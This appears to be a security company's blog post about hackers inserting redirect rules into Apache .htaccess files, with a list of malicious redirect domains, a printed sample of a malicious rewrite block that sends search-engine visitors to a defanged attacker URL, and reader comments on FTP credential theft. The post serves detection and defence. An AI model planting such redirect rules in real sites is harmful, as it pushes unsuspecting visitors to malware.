• Redirection Attacks

    Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

    One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.

    About the attack
    Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.

    Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.

    Where are visitors redirected?
    The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.

    aquarigger
    911docs
    thefreeadforum
    hqa-traffic
    twilightparadox
    googlexstat
    pomorze
    lixstats
    legenica
    

    How do I identify the malicious code
    Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.

    This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.

    <ifmodule>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
    RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
    </ifmodule>
    

    How do I protect my site?
    Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

    StopTheHacker.com customers are protected against these kind of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

    Till next time…

    • How the hacker change .htaccess ?

      Posted by Kathy on November 23rd

    • hackers can get access to hosting accounts by sniffing passwords and usernames stored on local FTP clients. Once they have the credentials, an automated bot inserts malware code into htaccess files or completely replaces the file itself.

      Posted by anirban on November 23rd